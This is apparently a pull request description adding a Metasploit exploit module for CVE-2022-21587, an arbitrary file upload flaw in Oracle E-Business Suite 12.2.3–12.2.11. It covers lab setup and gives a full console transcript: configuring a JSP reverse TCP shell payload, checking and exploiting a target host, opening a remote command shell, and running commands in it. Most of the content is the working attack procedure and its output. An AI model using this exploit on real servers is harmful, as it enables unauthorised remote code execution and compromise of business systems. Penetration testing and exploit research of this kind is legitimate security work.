This pull request adds an exploit module for CVE-2022-21587 - An arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle E-Business Suite versions 12.2.3 through to 12.2.11, in order to gain remote code execution.

I have done a technical analysis of the issue here: https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis

## Setup

You can download a Virtual Appliance of Oracle EBS from https://edelivery.oracle.com/osdc/faces/Home.jspx if you just register an account. I tested version 12.2.10 and followed the installation steps in the documentation that comes with the appliance.

## Verification

```
msf6 > use exploit/linux/http/oracle_ebs_rce_cve_2022_21587 
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > show options

Module options (exploit/linux/http/oracle_ebs_rce_cve_2022_21587):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
                                       oit.html
   RPORT    8000             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Oracle EBS on Linux



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set LHOST 192.168.86.5
LHOST => 192.168.86.5
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set RHOST 192.168.86.37
RHOST => 192.168.86.37
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > check
[*] 192.168.86.37:8000 - The target appears to be vulnerable.
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > exploit

[*] Started reverse TCP handler on 192.168.86.5:4444 
[*] Targeting the endpoint: /OA_HTML/BneOfflineLOVService
[*] Triggering the payload...
[+] Deleted /u01/install/APPS/fs1/FMW_Home/Oracle_EBS-app1/applications/forms/forms/saxjvm.jsp
[*] Command shell session 1 opened (192.168.86.5:4444 -> 192.168.86.37:43560) at 2023-02-09 16:17:35 +0000

id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux apps 3.10.0-1160.11.1.el7.x86_64 #1 SMP Tue Dec 15 11:58:45 PST 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.37 - Command shell session 1 closed.
msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) >
```
